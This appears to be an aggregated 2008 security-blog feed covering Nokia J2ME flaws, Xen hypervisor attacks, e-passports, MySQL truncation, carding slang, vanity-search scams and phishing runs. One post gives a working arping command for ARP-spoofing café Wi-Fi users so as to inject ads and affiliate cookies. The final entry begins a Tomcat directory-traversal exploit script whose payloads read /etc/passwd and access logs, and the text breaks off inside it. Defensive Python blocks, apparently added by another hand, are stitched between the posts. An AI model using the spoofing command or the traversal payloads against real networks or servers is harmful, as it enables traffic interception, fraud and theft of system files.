Nokia & Sun: Yes, Nokia S40 J2ME vulnerabilities exist - SecuriTeam Blogs

August 21, 2008 01:17 PM

I have never understood news articles using terms like ‘claims’ and ‘rumors’ when reporting on the several vulnerabilities reported in Nokia Series 40 (S40) phones.

Adam Gowdiak from Poland is a well-known researcher, the man behind the Windows RPC issue MS03-026, among others.

Sun has confirmed that older versions of Java 2 Platform Micro Edition (J2ME) are affected (this was on 15th Aug already) and Nokia confirmed these issues today (let’s say, at last).

It is not known if Sun Microsystems or Nokia Corp. paid €20 000 to Gowdiak, last week or possibly later.

Some references:

J2ME security vulnerabilities 2008
MIDP’s and MIDlets put tens of millions Nokia S40 phones in danger


Can you identify the white ninja? - Jeremiah Grossman

August 21, 2008 05:06 AM
During BlackHat USA, there were sightings of a mysterious white ninja. Witness reports claim he spoke with an English accent at 300 words per minute, raved on about sandboxing code, and plotted to take over the Web with a worm to wake people up (but just for a day). Anyone know who this phantom figure is?

Bonus points for posting the best photo caption. I’m thinking “practice safe output encoding”.

Byakugan WinDBG Plugin Released! - Metasploit

August 20, 2008 07:42 PM
Today, HD merged in an amalgamation of windbg tools and plugins with a funny name into the main metasploit tree. We've been working on this collection for a while now, and currently it represents (I think) a good step towards turning windbg from simply a good debugger into a powerful platform for exploit development.

The work that's currently released includes:

tenketsu - the Vista heap emulator/visualizer, which allows you to track how input to a program affects the heap in real time.

jutsu - a set of tools for tracking buffers through memory, determining what is controlled at crash time, and discovering valid relative return addresses based on that.

mushishi - a framework (with examples) for the detection and defeat of anti-debugging methods.

Used in conjunction with metasploit, jutsu in particular can significantly speed up exploit development time as it understands and makes use of msfpattern buffers natively. The README file can be found in the tree at external/source/byakugan/README and details functionality, usage, build, and installation. For the slides from the preliminary release at toorcon seattle, go here.

Currently we're looking for more suggestions for functionality. Anything that you do commonly and think may be automatable is up for discussion.

Attacking Xen: DomU vs. Dom0 consideration - invisiblethings' blog

August 20, 2008 01:00 PM
As it usually happens, there is some confusion regarding the attacks presented in our Xen 0wning Trilogy. Some people think they are possible only from Dom0 (the Xen's privileged, administrative domain) while some other people have the impression that all the attacks are possible from any unprivileged domain (DomU in Xen’s terminology). The truth is in the middle though.

Most of the attacks we presented do indeed require that the attacker first obtains access to Dom0 and only from there can launch further attacks. For example, the DMA attacks that allow overwriting hypervisor memory do indeed assume Dom0 access. The same applies to the Q35 exploit - this one is similar to the above-mentioned DMA attacks in that it also requires access to certain hardware (which is possible from Dom0), but it has the advantage that it can bypass the hypervisor VT-d protection in the recent Xen 3.3.

There are several reasons why those attacks are still very important though:
1) First, note that the requirement for the attacker to have access to Dom0 in order to install e.g. hypervisor rootkits is similar to the requirement that in order to install a Windows or Linux rootkit, one first needs to obtain administrator's privileges. Yet we know that Windows or Linux rootkits are a serious security problem.

2) Concerning the Xen-based systems specifically: over the last year several bugs have been discovered and published, that allowed an attacker to gain control of the Domain0 from an unprivileged domain (i.e. escape from the virtual machine). Rafal has discovered one such bug in December 2007.

3) Recent versions of Xen make deliberate effort to protect the hypervisor even from the Dom0. On systems that have IOMMU support (e.g. Intel's VT-d), the hypervisor memory is protected from tampering using both the processor's ring3/ring0 separation mechanism as well as the IOMMU protection. We showed that those protections can be bypassed.

The attempt to isolate the hypervisor and protect it even from attacks originating from Dom0 is not surprising. After all, if we would like to treat the hypervisor as a root of trust, then we should make sure that its code base is minimal. If we now allow Dom0 to effectively be the hypervisor (i.e. if we don't care about Dom0-to-hypervisor escalations), then we should include all the Dom0 code in the hypervisor code base when evaluating hypervisor security. This would result in our "extended hypervisor" having not ~300k lines of code (like current Xen does), but millions of lines of code!

Having said all that about how important it is to prevent all the possible Dom0-to-hypervisor attacks, I should stress that we also presented an attack that does not require Dom0 access and that can be launched from an unprivileged DomU domain. As far as I'm aware, Rafal's FLASK bug & exploit (presented in the 2nd presentation) was the first public example of a successful exploitation of an overflow in a bare-metal hypervisor. The bug was a heap overflow and Rafal presented some clever tricks for controlling Xen's heap allocations in order to make this bug exploitable.

Please note that all the rootkit-like stuff that we also presented, i.e. Rafal's Xen Loadable Modules framework and his hypervisor rootkits, as well as Alex's and my XenBluePill, can all be used with all the above-mentioned attacks. So, e.g. if we are on a machine that has VT-d support and runs Xen 3.3, we can still use the Q35 attack to get the XLM framework running and then use it to install e.g. XenBluePill on top of the running Xen, as shown during the 3rd presentation. Similarly, we could use the FLASK exploit to get XLM running and again use it for installation of the other stuff.

Hope this clears up some confusion about our presentations. As already promised, the code and demos and the full version of the 2nd talk slides (with the Q35 attack details) will be posted after Intel releases the patch for their motherboards. Stay tuned.

Risky Business #74 — HOWTO: Make your own Elvis bin Laden e-passport - Risky Business

August 19, 2008 03:25 AM

This week’s Risky Business is brought to you by Microsoft and hosted, as always, by Vigabyte virtual hosting. On this week’s show we take a look at e-passport security. After 9-11, Chimp W Shrub decreed that foreigners wanting to enter the United States would soon need to carry new-fangled, biometric passports with embedded wireless RFIDs.

The result was a rush job the likes of which you’ve never seen.

This week’s guest, Peter Gutmann, has figured out how to modify the data on e-passport chips. He hasn’t broken the encryption scheme responsible for signing the data but that doesn’t matter — no one checks to see if the signing key is genuine and even if they do the implementation is so bad it’s easy to fool.

The recent theft in Britain of 3,000 blank e-passports in a van hijacking is starting to make a lot more sense.

ZDNet Australia’s Munir Kotadia is back this week to chat about recent news, and this week’s sponsor interview is with Microsoft’s Jeffery Jones who talks comparative vulnerability analysis.

The music used at the end of this week’s podcast comes from Marshall and the Fro. Australians can buy the band’s album for $25 via Paypal (postage paid) here. Music used with permission.


rdist - root labs rdist

August 18, 2008 08:02 PM

When I find a functional bug in an application, I think it’s useful to post the solution for others to find.  Here are two recent problems I solved.

Thunderbird allows you to switch SMTP servers.  However, sometimes it appeared like the setting change wasn’t taking effect.  While I’d change the server, some mail would still use the old setting and some would use the new.  Even plug-ins designed to help with this didn’t work reliably.

I tracked this down to the Identities feature.  It allows you to set up different identities (email addresses) under a single account.  This means that with two identities, there are actually three different places the SMTP server and other information is set.  The global account settings panel (Tools -> Account Settings -> Outgoing Server (SMTP)) and all identities (… -> Manage Identities -> Edit each profile) need to be changed in order to switch servers.  While I agree that some things make sense to make local to an identity (e.g., signature file), SMTP server should only be a per-account setting.

I like using cygwin on Windows for a somewhat reasonable Unix-like environment.  There are two shells that can be used: bash and rxvt.  The bash shell runs within a Windows command prompt instance, and inherits the same annoyances from there.  Text selection works differently, there is no real terminal emulation, and scrollback is not reliable.  I switched to rxvt to fix a lot of those problems, but had to keep bash around for one reason.  When I tried to run Windows python from rxvt, it would just hang during startup.  The cygwin python worked fine.

It turns out that the rxvt code allocates a pty.  You can see this by typing “tty” in both bash and rxvt.  The former reports “/dev/console” and the latter, something like “/dev/tty1”.  I believe the reason is that Windows consoles (and thus bash) actually use a separate API for working with the user.  Thus, Windows python calls to that API hang if the shell isn’t actually running in the console.

This is similar to an experience I had trying to do asynchronous IO with a Windows console.  I had written a small serial port comms tool that would work interactively, printing output when the device generated it and accepting input from the user.  It worked fine until the user started typing, then the input routine would block.  Nothing worked with it, not WFMO, setting asynchronous mode on the stdin handle and polling, or even threads.  A read from the console blocks all process execution, including all the process’s threads, until the input is completed.

I hope this helps you if you encounter similar problems.

MySQL Truncation Etc… - ha.ckers.org web application security lab

August 18, 2008 03:04 PM

Stefan Esser has a really good article about how MySQL and SQL truncate columns, which can lead to security holes. He uses a good example of a column that has a width of 16 chars but he submits something with 17 chars. Obviously enforcing the length on input is one way to prevent that, even if it almost never happens. But one other thing came to mind.

Harkening back to my days of reading Rain Forest Puppy’s papers, I realized that oftentimes the code does a straight regex or string match. E.g.: if ($username eq "admin") { fail(); } but if the $username was "admin    " it clearly will pass the string check since it’s not an exact match, yet it will have the same net effect in the database, passing the check and allowing you to access the admin data. Likewise padding in front of the username will have the same effect in some cases - depending on how the SQL query is constructed (if it’s encapsulated). Anyway, good article, go read it!
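To make the interaction concrete, here is an added example (not from the post or from Stefan Esser’s article) that simulates the two MySQL behaviours involved, silent truncation to the column width in non-strict mode and trailing-space-insensitive comparison under PAD SPACE collations, next to an exact-match application check like the Perl snippet above. The column width of 16, the table contents and the crafted username are constructed for the demonstration; the hardened registration routine shows the length and whitespace checks the post says are rarely done.

```python
# Added example (not from the post or Stefan Esser's article): a small
# simulation of two MySQL behaviours that combine with an exact-match
# application check to let a second "admin" row appear.  Constructed values.

COLUMN_WIDTH = 16   # VARCHAR(16) username column, as in the article's example


def mysql_store_varchar(value: str, width: int = COLUMN_WIDTH) -> str:
    """Non-strict sql_mode: an over-long value is silently truncated."""
    return value[:width]


def mysql_pad_space_equal(a: str, b: str) -> bool:
    """PAD SPACE collations ignore trailing spaces when comparing strings."""
    return a.rstrip(" ") == b.rstrip(" ")


class UserTable:
    """Just enough of a users table to show the effect."""

    def __init__(self):
        self.rows = []          # (username, role)

    def insert(self, username: str, role: str) -> None:
        self.rows.append((mysql_store_varchar(username), role))

    def select_by_name(self, username: str):
        # Models: SELECT * FROM users WHERE username = ?
        return [r for r in self.rows if mysql_pad_space_equal(r[0], username)]


def register_vulnerable(table: UserTable, requested: str, role: str = "user") -> bool:
    # Exact string match, like the page's `if ($username eq "admin")` check.
    if requested == "admin":
        return False
    table.insert(requested, role)
    return True


def register_hardened(table: UserTable, requested: str, role: str = "user") -> bool:
    # 1. Refuse anything the column cannot hold verbatim (no silent truncation).
    if len(requested) > COLUMN_WIDTH:
        return False
    # 2. Refuse leading/trailing whitespace instead of trusting the collation.
    if requested != requested.strip():
        return False
    # 3. Look for an existing row using the database's own comparison rules,
    #    so a name that collides under PAD SPACE semantics is rejected too.
    if table.select_by_name(requested):
        return False
    table.insert(requested, role)
    return True


def demo():
    # 'admin' + 11 spaces fills the 16-char column; the 17th char 'x' is what
    # defeats the exact-match check and is then truncated away by the database.
    crafted = "admin" + " " * 11 + "x"

    vulnerable = UserTable()
    vulnerable.insert("admin", "superuser")
    accepted_vuln = register_vulnerable(vulnerable, crafted)
    rows_vuln = len(vulnerable.select_by_name("admin"))       # 2 rows match

    hardened = UserTable()
    hardened.insert("admin", "superuser")
    accepted_hard = register_hardened(hardened, crafted)
    rows_hard = len(hardened.select_by_name("admin"))         # still 1 row

    return accepted_vuln, rows_vuln, accepted_hard, rows_hard


if __name__ == "__main__":
    print(demo())   # (True, 2, False, 1)
```

The point of step 3 in `register_hardened` is that uniqueness has to be decided with the same comparison rules the database will later use for `WHERE username = ?`; a Python `==` on the raw input is not that comparison. Running MySQL in strict sql_mode (so over-long values error out instead of being truncated) removes the first half of the problem at the database layer as well.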

Drops, Dumps, CVVS, WMZ, WU, et cetera... - F-Secure Antivirus Research Weblog

August 18, 2008 11:00 AM
Underground forums are always full of chatter around various activities related to online crime.

You keep reading about things like dumps (stolen credit card information), carding (using those cards), WU (Western Union), WMZ (Webmoney), CVVs (card verification value) and drops.

So what's a drop?

A drop is a remailing location. Many online shops refuse to send expensive items (think laptops, video cameras and so on) to faraway countries. So criminals use stolen credit cards to purchase items and have them mailed to a local drop, where someone else picks up the gear and forwards it to the final destination. Alternatively the dropkeeper will simply sell the goods in online auctions and then credit the carder with part of the profits.

Here's an example from an underground forum where an individual is advertising his website, providing such services. He offers 25% of the profits of the carder items to the carder — keeping 75% to himself.

Drops

And here's his website. Nice one.

Drops

On 18/08/08 At 11:41 AM

Getting Paid For Others’ Work - SecuriTeam Blogs

August 17, 2008 08:18 PM

As I was turning to signal my waitress for the bill, I noticed that aside from the couple in the corner, everybody else was hooked to their laptops. Times have changed and now people sit in cafes for wireless internet, a playlist on shuffle and some good cappuccino. Even though we are all mixing business with pleasure, we are just like the next guy: we eat, we Google, we Facebook.

But I’m not here to talk about aroma, I’m here to explain how you can get money for somebody else’s work.

Tap the airwaves and play the role of a man-in-the-middle. When you’re right in the center of things, imagine doing these:

  • Grep and replace adsense code blocks with your own pub-id. You will get paid, and not the owner of the website.
  • Shove 1×1 px iframes to Amazon with your affiliation tag. These will store a cookie on the victim’s browser with your tag. Even if she buys a book a week later, you will still get your hard-earned pay.
  • Replace facebook ads with match.com affiliation blocks.
  • Proxy DNS lookups, and if dns resolve fails, show ads instead.

So how is it done? Quite simple: WLAN is merely an ethernet network over the airwaves. It deals with the same concepts: IPs, MACs and ARP. Whenever a program wishes to connect to a remote box (outside your netmask), it will route the requests via the gateway. This gateway is the wireless router your laptop is connected to. Computers inside the local area network communicate using the ethernet protocol, so when my laptop sends an IP packet to the gateway, it wraps it up with an ethernet header. ARP is the protocol used to associate IP addresses with MAC addresses.

The brunette next to the magazine stand is using her laptop. Since we are both connected to the same gateway, we are on the same subnet. Using a nifty tool called arping, I can send an ARP announcement (also called a “Gratuitous ARP”) to her computer, forcing it to associate the gateway IP address with my laptop’s MAC address. So whenever she browses the internet, my computer will receive all the packets.

I have no idea what her IP address is, and it doesn’t really matter. I can just broadcast an ARP announcement and update all ARP caches in this subnet. Consider the following command line:
C:\>arping -i "\Device\NPF_{031C071A-8ED1-4AD9-8FD6-A930D4FA15F9}" -v -S 192.168.0.1 -s 00-1b-77-53-f7-2f -B

This will broadcast (-B) an arp announcement of the address (-S) 192.168.0.1 (gw) with the mac address (-s) of my laptop. Use Wireshark to find out the interface name (-i) of your wireless adapter. If you are targeting a single computer, replace -B with the ip address of the victim.

Note that broadcasting to the entire subnet will also damage your own ARP cache table. To re-associate with the real MAC address, clear the entry with ‘arp -d’.

Unlike other approaches to a man-in-the-middle attack, this one keeps you hidden. Unless you make it obvious, people won’t suspect. After all, it hijacks an existing router, does not require reconnecting, and I am pretty sure nobody keeps a record of their ARP table.

Remember, just don’t be a jerk.
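The post closes on the observation that nobody keeps a record of their ARP table; keeping one is exactly how this attack is detected. The following is an added example, not code from the post, that does that from the defender’s side: it parses ARP replies in tcpdump-style `is-at` lines, records the first MAC seen for each IP as the baseline, and flags any later reply that claims the same IP (the gateway especially) with a different MAC, as well as any single MAC that answers for several IPs. The log lines, addresses and MACs are constructed for the example.

```python
import re

# Constructed ARP traffic in tcpdump-style "is-at" reply lines.  Addresses and
# MACs are made up; the third line is the kind of gratuitous reply the post
# describes, re-binding the gateway IP to a different adapter.
SAMPLE_ARP_LOG = """\
12:00:01.000000 ARP, Reply 192.168.0.1 is-at 00:11:22:33:44:55, length 28
12:00:02.000000 ARP, Reply 192.168.0.23 is-at 00:aa:bb:cc:dd:ee, length 28
12:00:05.000000 ARP, Reply 192.168.0.1 is-at 00:1b:77:53:f7:2f, length 28
12:00:06.000000 ARP, Reply 192.168.0.1 is-at 00:1b:77:53:f7:2f, length 28
12:00:09.000000 ARP, Reply 192.168.0.42 is-at 00:1b:77:53:f7:2f, length 28
"""

ARP_REPLY_RE = re.compile(
    r"^(?P<ts>\S+) ARP, Reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) "
    r"is-at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)


def parse_arp_replies(text):
    """Yield (timestamp, ip, mac) tuples for every ARP reply line in the text."""
    events = []
    for line in text.splitlines():
        m = ARP_REPLY_RE.match(line)
        if m:
            events.append((m["ts"], m["ip"], m["mac"].lower()))
    return events


def detect_arp_poisoning(events, gateway_ip=None):
    """Return (alerts, multi_ip_macs).

    The first MAC observed for an IP becomes the baseline binding; a later
    reply claiming that IP with a different MAC produces one alert per
    (ip, mac) pair.  A MAC that answers for more than one IP is reported
    separately, since a man-in-the-middle typically claims the gateway's
    address as well as its own.
    """
    baseline = {}        # ip -> first-seen mac
    claims = {}          # mac -> set of ips it has answered for
    flagged = set()      # (ip, mac) pairs already alerted on
    alerts = []
    for ts, ip, mac in events:
        claims.setdefault(mac, set()).add(ip)
        expected = baseline.setdefault(ip, mac)
        if expected != mac and (ip, mac) not in flagged:
            flagged.add((ip, mac))
            alerts.append({
                "ts": ts,
                "ip": ip,
                "expected_mac": expected,
                "seen_mac": mac,
                "severity": "high" if ip == gateway_ip else "medium",
            })
    multi_ip_macs = {m: sorted(ips) for m, ips in claims.items() if len(ips) > 1}
    return alerts, multi_ip_macs


def analyse(text, gateway_ip=None):
    return detect_arp_poisoning(parse_arp_replies(text), gateway_ip)


if __name__ == "__main__":
    found, multi = analyse(SAMPLE_ARP_LOG, gateway_ip="192.168.0.1")
    for a in found:
        print(f"[{a['severity']}] {a['ts']} {a['ip']} moved from "
              f"{a['expected_mac']} to {a['seen_mac']}")
    print("MACs answering for several IPs:", multi)
```

The baseline is deliberately the first observation rather than a configured list, so the script works on an unfamiliar network; on a managed one, a static ARP entry for the gateway on each client (the `arp -s` counterpart to the post’s `arp -d`) and a per-site table of expected gateway MACs turn the same logic into a hard check rather than a heuristic.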


HTML 5.0 - ha.ckers.org web application security lab

August 16, 2008 05:58 PM

On good authority I was told to take a good hard look at the newly proposed HTML 5.0 spec that’s floating around the WHATWG. Firstly my eyes went to the new video and audio tags, which are meant to help users deal with the apparently confusing nature of the fact that we have img tags instead of just using embed for everything. Personally I think that’s just a horrible idea that’s going to break a lot of blacklists out there and potentially open more security holes, depending on whether scriptable video objects are allowed, but there you have it.

Anyway, so then my eyes glanced across the new iframe spec and lo and behold I saw a miracle. Someone over at the WHATWG was really paying attention. Firstly, there’s a new parameter called sandbox which is similar in many respects to IE’s proprietary security="restricted" parameter but with more granular controls. That’s not necessarily a good thing if you don’t like being framed, but it does give websites more control over what happens to their site once they frame a site that turns out to be bad.

But more importantly there is another new parameter called seamless which will allow a page of the same origin domain to iframe a page without having all the usability issues (double scroll bars, _self targets and so on) of the original iframe model. That’s great news for websites that want to frame and control a page on their own domain (a la content restrictions) without all the crazy usability issues with iframes. There are some other security concerns with allowing content to be accessible on your site - there needs to be some tag to disallow rendering unless it’s embedded within an iframe, to prevent someone from calling the malicious child frame directly. However, this is a big step forward in the right direction.

Vanity Search Attacks - SecuriTeam Blogs

August 16, 2008 09:41 AM

“How did you two meet? Did you mark her, or was it the other way around?”

- Robert Redford to Brad Pitt, Spy Game

Con man 101: The best way to gain someone’s confidence is to make them think they contacted you. Scammers just love having potential victims contacting them.

Now, it seems they figured an interesting way to draw potential victims to their web site, in a way that is much easier than sending billions of spam email messages.
The idea is simple: take the person’s name (real people’s names are available for harvesting in places like linkedin, facebook, and other social networks) and put it in a web page. Doesn’t really matter where, as long as google indexes it.

Wait a while, and have that person google himself. Many people (myself included) have a ‘google alert’ on their name which sends them an updated list of links to new pages where their name is mentioned.

Everyone likes to see where they are mentioned, so they will click on the link. And voila! They arrive at the spammer’s page. In some cases I’ve seen, the name was already gone from the page (but was still in the google cache). But all this doesn’t matter: as soon as the person reached the page, the web spammer’s job is done – he got his message in front of you, and maybe you’ll even dig deeper into his web site trying to figure out what the connection is to you.

There are many advantages to this method. First, you are not restricted by the message: the web page can openly have the words Viagra, Credit card debt and mortgage assistance without the fear of triggering anti-spam software. Also, people will pay more attention to the page since they think it has to do with them.

I don’t get the spammers’ marketing statistics, but I’m sure that the infamous spam text “it came to our attention that you’re in dire need of financial help” which sounds very much like a sincere, personal message, is a huge success. But this message has to get through the spam filters and include a real email address and a correct first/last name. The spam web page doesn’t need to bypass spam filters, and already has the correct name. In addition, you gain interesting information about the visitor: browser version, IP location and of course, the name he was searching for (that would be in the ‘referrer’ that is sent automatically by the browser to the web site). Oh, and of course – it’s cheap. You only need to put together a nice looking web page, and wait for google to do the rest. No buying of email lists and no cost of sending spam (which is nowadays the cost of hiring a zombie botnet for a couple of days).

For those aspiring scammers who are reading this, you should understand that it’s not a foolproof method. Obviously, it requires people to do a vanity search to reach you in the first place (though it also works on people who google their dates, their parents or their teachers). It also requires time – days, weeks or months (which may be difficult if your web site is on a zombie computer that might disappear by the time google indexes and the user comes to the site). But due to the fact the costs are very small, and there are no effective countermeasures at the moment, I think we will see more and more such attacks in the near future.


Linus and the “Security Circus” - SecuriTeam Blogs

August 16, 2008 01:15 AM

Ladeeeeez and gentlemen!

Well, methinks Linus is going to be “security villain of the week” for a few days again.

http://www.networkworld.com/news/2008/081408-torvalds-security-circus.html?hpg1=bn
Problem is, he’s actually got a good point.  Unfortunately, his use of “security circus” is going to be read as the whole security community, when he is actually referring to the lunatic fringes at both ends of the “disclosure” spectrum.  There are those who still cling to the outdated and disproved dogma of “security by obscurity,” and there are the self-promoters (with egos the size of the MS Windows Vista source code) who are eager to trumpet any little flaw they find as a “security” vulnerability.  Those of us in the trenches have been trying to keep vendors and consultants from using these arguments on the uninformed for years.  Linus is saying the same thing.  He’s as frustrated as we are, and for the same reasons.  He just uses more sensational phrases.


Security Bulletin Webcast Questions & Answers - August 2008 - The Microsoft Security Response Center (MSRC)

August 15, 2008 04:33 PM

Hi,

During this month’s webcast we were able to address 15 questions in the time allotted. There were several questions regarding ActiveX for the Cumulative IE Update (MS08-045), the Access Snapshot Viewer (MS08-041), Outlook Express Messenger (MS08-050) and the ActiveX Kill bits Security Advisory. We also fielded several questions around various deployment tools used for updating and we addressed some questions about the IPSec Update (MS08-047).

Here is the link to the full Q&A so you can see all of the answers that were provided for these great questions:

http://blogs.technet.com/msrc/pages/monthly-security-bulletin-webcast-q-a-august-2008.aspx

Also, here is the link to the Q&A index page in case you want to view previous months:

http://blogs.technet.com/msrc/pages/microsoft-security-bulletin-webcast-q-a-index-page.aspx

As always, customers experiencing issues installing any of the updates this month should contact our Customer Service and Support group:

Customers in the U.S. and Canada can receive technical support from Microsoft Product Support Services at 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates.

International customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.

Thanks!

Al Brown

*This posting is provided "AS IS" with no warranties, and confers no rights.*


The Security Question Vulnerability - SecuriTeam Blogs

August 14, 2008 02:02 PM

How easy is it to break into your Gmail account? How about Yahoo! Or Windows Live?
If you provided a truthful answer to the security question during signup, it is probably quite easy to hijack your account, with just a little bit of research.

Take a look at the Yahoo! Security Questions:

Yahoo Security Questions

Are these security questions?

Anyone that knows my address can easily figure out the name of my first school or my high school mascot. All of my neighbors, family and friends know both my dog’s name and my dad’s middle name, and everybody in the world knows I just LOVE the Lakers. As for my wife and me, the people who attended our wedding had the chance to hear about it in the ceremony - in case you couldn’t make it, we met on a roof of a bus, in Ladakh, India in 1994…

The fact that the answer to each of the security questions above is relatively easy to find out makes them a security vulnerability in my Yahoo! account.
By letting me make a security key based on the name of my first school, Yahoo! actually puts me at risk, allowing anyone that knows where I live to hijack my account. It’s like saying “We have the greatest lock to protect your house. Now, why don’t we hide the key under the mat”.

Windows Live is pretty much the same as Yahoo!:

windows live security questions
Gmail is a little bit more sophisticated with one major difference:
gmail security questions

Gmail is the only one of these three that allows you to choose your own question.
By letting you do that, Gmail asks “which question only you can answer?” I think that most people might still come up with “Who is my favorite singer”, “What is my date of birth” or “My dog’s name”.
However, that isn’t a security vulnerability encouraged by Google. If they give you the tools and you fail to use them, it’s not their fault.

So, what can we do about it?
If you can write your own question, that would be the best. If not, choose the question about the name of your first school and put your first phone number as the answer. That’s what I did! :)

Got better ideas? Share them with us!


rdist - root labs rdist

August 14, 2008 01:04 AM

The next Baysec meeting is tomorrow at Pete’s Tavern. Come out and meet fellow security people from all over the Bay Area.  As always, this is not a sponsored meeting, there is no agenda or speakers, and no RSVP is needed.  Thanks go to Ryan Russell and  for planning all this.

See you tomorrow, August 14th, 7-11 pm.

Pete’s Tavern
128 King St. (at 2nd)
San Francisco

That device on my work computer - was it there yesterday? - SecuriTeam Blogs

August 13, 2008 09:57 PM

Bank robbers who used a remote control device to control the mouse cursor of a bank employee have now been jailed, the headlines report.

We can’t expect that an ordinary worker will know whether USB sticks, peripherals with Bluetooth enabled, innocent-looking hardware keyloggers etc. connected to their desktop computers, and even to laptops, are malicious - and not installed by local IT support.

This Swedish worker recognized an odd device connected to his workstation, but a target organization is not so lucky every time. “Employee quickly pulled the plug, interrupting a transfer” ($7.9 million), but there was an extra cable which ended up under his desk.

It’s worth mentioning that this remote control device had been installed on the bank workstation during a previous break-in, during which nothing had been stolen from the building.

Therefore, the ways how we can protect against these threats are not so typical:

* Check the USB and PS/2 connectors of your workstations and servers several times a year
* Always check these connectors when a computer returns from being repaired
* Remember that visitors often have the opportunity to connect such devices


MSNBC / CNN malware run - F-Secure Antivirus Research Weblog

August 13, 2008 02:30 PM
For some days we've been seeing spam runs with titles like "CNN Alerts: My Custom Alert" or "CNN Alerts: Breaking news". These are fake news articles that point to a fake news page that will try to download malware to your machine.

Apparently people stopped clicking on fake CNN links as today the attackers switched the mails to look like they are now coming from MSNBC.

Some examples:

msnbc

Example email:

  • From: MSNBC Breaking News
    Subject: msnbc.com - BREAKING NEWS: Elvis Presley daughter gives birth to twins
    Precedence: list

    msnbc.com: BREAKING NEWS: Elvis Presley daughter gives birth to twins
    Find out more at http://breakingnews.msnbc.com
    ======================================================
    See the top news of the day at MSNBC.com, and the latest from Today Show and NBC Nightly News.
    =========================================
    This e-mail is never sent unsolicited. You have received this MSNBC Breaking News Newsletter
    newsletter because you subscribed to it or, someone forwarded it to you.
    To remove yourself from the list (or to add yourself to the list if this
    message was forwarded to you) simply go to
    http://www.msnbc.msn.com/id/11611202, select unsubscribe, enter the
    email address receiving this message, and click the Go button.
    Microsoft Corporation - One Microsoft Way - Redmond, WA 98052
    MSN PRIVACY STATEMENT
    http://privacy.msn.com (http://privacy.msn.com/)


And the links point to a web page looking like this (notice the sudden change from MSNBC to CNN):

cnn

The site tries to prompt you to download ADOBE_FLASH.EXE, which we detect as Trojan-Downloader.Win32.Exchanger.mn.
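The tell in these lures is the mismatch the post points out: the mail claims to be an MSNBC (or CNN) alert while its links lead somewhere else entirely. The following is an added example, not F-Secure’s code, of a mail-gateway check for exactly that: it parses the message, works out which brand the sender and subject claim, and reports every link whose host is not under that brand’s domains. The sample message is constructed from the text quoted above with a placeholder link target in the reserved `.invalid` TLD; the sender address and the per-brand domain allow-list are assumptions for the example.

```python
import email
import re
from email import policy
from urllib.parse import urlparse

# Constructed message modelled on the lure quoted above.  The sender address
# and the link target are placeholders, not real hosts from the campaign.
SAMPLE_LURE = """\
From: MSNBC Breaking News <breakingnews@msnbc.com>
To: victim@example.org
Subject: msnbc.com - BREAKING NEWS: Elvis Presley daughter gives birth to twins
Precedence: list
Content-Type: text/plain; charset=us-ascii

msnbc.com: BREAKING NEWS: Elvis Presley daughter gives birth to twins
Find out more at http://breakingnews.msnbc.com.lure-placeholder.invalid/news/
======================================================
MSN PRIVACY STATEMENT
http://privacy.msn.com (http://privacy.msn.com/)
"""

# A constructed genuine-looking alert whose links all stay on brand.
SAMPLE_LEGIT = """\
From: MSNBC Breaking News <breakingnews@msnbc.com>
To: victim@example.org
Subject: msnbc.com - BREAKING NEWS: Example headline
Content-Type: text/plain; charset=us-ascii

Find out more at http://www.msnbc.msn.com/id/11611202
"""

# Domains each brand legitimately links to (assumed allow-list for the example).
BRAND_DOMAINS = {
    "msnbc": {"msnbc.com", "msnbc.msn.com", "msn.com"},
    "cnn": {"cnn.com"},
}

URL_RE = re.compile(r"https?://[^\s()<>\"']+")


def domain_matches(host: str, allowed) -> bool:
    """True if host is one of the allowed domains or a subdomain of one.

    Suffix matching on whole labels is what defeats look-alike hosts such as
    'breakingnews.msnbc.com.something.invalid', which merely *start* with the
    brand's domain.
    """
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in allowed)


def classify_news_alert(raw: str) -> dict:
    msg = email.message_from_string(raw, policy=policy.default)
    sender = (msg.get("From") or "").lower()
    subject = (msg.get("Subject") or "").lower()
    brand = next((b for b in BRAND_DOMAINS if b in sender or b in subject), None)
    if brand is None:
        return {"verdict": "not-a-news-alert", "brand": None, "off_brand_links": []}

    body_part = msg.get_body(preferencelist=("plain",))
    body = body_part.get_content() if body_part is not None else ""
    off_brand = [
        url for url in URL_RE.findall(body)
        if not domain_matches(urlparse(url).hostname or "", BRAND_DOMAINS[brand])
    ]
    verdict = "suspicious" if off_brand else "links-consistent"
    return {"verdict": verdict, "brand": brand, "off_brand_links": off_brand}


if __name__ == "__main__":
    for sample in (SAMPLE_LURE, SAMPLE_LEGIT):
        print(classify_news_alert(sample))
```

The check is deliberately narrow: it says nothing about the content of the landing page, only that a message trading on a news brand links off that brand’s domains, which is enough to quarantine the mail for review. The switch from CNN to MSNBC that the post describes costs the attacker nothing, which is why the brand list is data rather than code.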

On 13/08/08 At 03:03 PM

Exploiting Apache Tomcat. - 0x000000 Security

August 13, 2008 01:00 PM
You might have seen the new Apache Tomcat <= 6.0.18 vulnerability found by Simon Ryeo[1]. The vulnerability involved a problem in Tomcat with processing UTF-8 encoded URIs, which resulted in directory traversal and canonicalization issues while mapping the paths. If context.xml or server.xml allows 'allowLinking' and sets 'URIencoding' to 'UTF-8', directory traversal becomes possible. Curiously enough, this is pretty much de facto on *NIX systems. Ah, the joy of standards! I don't know what is happening at Apache, but Tomcat is quite often vulnerable. It isn't the first time you see this.

So let's exploit *cough* test it:

<?php

$url = "http://www.google.com";

$dir = array(
"%c0%ae%c0%ae/etc/passwd",
"%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/httpd/access_log",
